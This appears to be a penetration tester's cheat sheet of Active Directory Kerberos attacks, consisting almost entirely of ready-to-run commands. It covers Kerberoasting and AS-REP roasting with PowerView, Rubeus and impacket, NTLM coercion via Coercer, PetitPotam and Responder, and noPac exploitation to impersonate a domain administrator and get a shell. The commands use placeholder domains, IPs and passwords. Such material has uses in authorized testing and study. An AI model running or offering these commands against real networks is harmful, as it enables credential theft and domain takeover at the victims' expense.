Kerberos Attacks
Kerberoasting
Kerberoasting is an attack against service accounts that allows an attacker to perform an offline password-cracking attack against the Active Directory account associated with the service. We need a valid domain user account and password.
Vulnerability detection
PowerView
Import-Module .\PowerView.ps1
Get-DomainUser -SPN
Windows
PowerView
Import-Module .\PowerView.ps1
Invoke-Kerberoast
Rubeus
.\Rubeus.exe kerberoast /nowrap
Linux
impacket-GetUserSPNs -target-domain domain.local -usersfile users.txt -dc-ip dc01.domain.local domain.local/guest -no-pass
AS-REP Roasting
Do not require Kerberos preauthentication
Windows
- PowerView Manual
Get-ADUser -filter * -properties DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth -eq "True" -and $_.Enabled -eq "True"} | select Name
- PowerView Auto
Import-Module .\PowerView.ps1
Get-DomainUser -UACFilter DONT_REQ_PREAUTH
- Rubeus
.\Rubeus.exe asreproast /user:full.name /domain:domain.local /dc:dc01.domain.local
Linux
impacket-GetNPUsers domain.local/ -no-pass -request -k -usersfile users.txt
Coerced Authentication
Coercer (rpc)
python3 Coercer.py coerce -d domain.local --target-ip 10.10.10.x -l 10.10.10.x --always-continue
PetitPotam
Setup Responder
sudo responder -I tun0
Run PetitPotam to coerce and send you the NTLM hash
Your ip: 10.10.10.x
Victim ip: 10.10.10.y
python3 PetitPotam.py 10.10.10.x 10.10.10.y -u 'svc_user' -p 'password1'
Guest user
python3 PetitPotam.py 10.10.10.x 10.10.10.y -u '' -p ''
NoPac
Python
faketime -f +7h python3 noPac.py domain.local/user1:'Password1' -dc-ip 10.10.10.x -use-ldap -shell --impersonate administrator
PowerShell
Invoke-noPac
Scan the network
Invoke-noPac -Command "scan -domain domain.local -user user1 -pass Password1"
Add a computer account
Invoke-noPac -Command "-domain domain.local -user winrm_svc -pass test111!! /enctype rc4 /dc dc01.domain.local /mAccount testmachine /mPassword testmachinepass /service cifs /ptt"
noPac
.\noPac.exe scan -domain domain.local -user user1 -pass 'Password1'